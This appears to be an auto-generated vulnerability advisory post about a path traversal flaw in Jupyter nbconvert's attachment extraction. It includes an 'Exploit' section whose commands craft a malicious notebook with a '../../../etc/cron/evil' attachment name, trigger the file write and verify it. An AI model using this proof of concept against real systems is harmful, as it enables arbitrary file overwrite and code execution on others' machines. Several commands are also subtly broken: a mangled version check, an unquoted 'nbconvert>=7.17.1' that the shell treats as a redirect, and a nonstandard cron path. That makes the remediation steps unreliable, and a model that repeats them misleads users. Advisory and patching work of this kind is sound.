Listen to this Post
The vulnerability exists in nbconvert, a Jupyter tool that converts notebooks to other formats via Jinja templates. The vulnerable component is the ExtractAttachmentsPreprocessor. This preprocessor is responsible for extracting cell attachments from notebooks and writing them to the filesystem. The flaw is that it passes attachment filenames directly to filesystem operations without any sanitization. This enables classic path traversal attacks using sequences like ../. Attackers can craft a malicious notebook where a cell attachment filename contains traversal sequences. When nbconvert processes such a notebook, the preprocessor writes the attachment to a location relative to the traversal path. Because no validation is performed, an attacker can write arbitrary content to any location the nbconvert process can access. The attacker controls both the destination path and the file extension. This can lead to overwriting sensitive system files, planting executable payloads, or modifying configuration files. The vulnerability affects all nbconvert versions from 6.5 through 7.17.0. The issue is fixed in version 7.17.1, which sanitizes attachment filenames. A workaround is to disable the `ExtractAttachmentsPreprocessor` entirely by setting --ExtractAttachmentsPreprocessor.enabled=False. The CVSS score is 6.5 (Medium), with high integrity and availability impacts.
dailycve form:
Platform: Jupyter nbconvert
Version: 6.5-7.17.0
Vulnerability: Path Traversal
Severity: Medium
date: 2026-04-21
Prediction: 2026-04-21
Analytics under What Undercode Say:
Check if vulnerable pip show nbconvert | grep Version nbconvert --version Detect vulnerable versions python -c "import nbconvert; print(nbconvert.<strong>version</strong>)" Extract attachments preprocessor status jupyter nbconvert --ExtractAttachmentsPreprocessor.enabled=True --help-all | grep enabled
Exploit:
Create malicious notebook with path traversal
echo '{"cells":[{"cell_type":"markdown","metadata":{},"source":["test"],"attachments":{"../../../etc/cron/evil":{"text/plain":"malicious"}}}]}' > evil.ipynb
Trigger exploit
jupyter nbconvert evil.ipynb --to html --ExtractAttachmentsPreprocessor.enabled=True
Verify file write
ls -la /etc/cron/evil
Protection from this CVE:
Upgrade to patched version pip install --upgrade nbconvert>=7.17.1 Disable vulnerable preprocessor (workaround) jupyter nbconvert notebook.ipynb --to pdf --ExtractAttachmentsPreprocessor.enabled=False Or set in config file echo "c.ExtractAttachmentsPreprocessor.enabled = False" >> ~/.jupyter/jupyter_nbconvert_config.py
Impact:
Complete arbitrary file write leading to remote code execution, data corruption, or denial of service.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

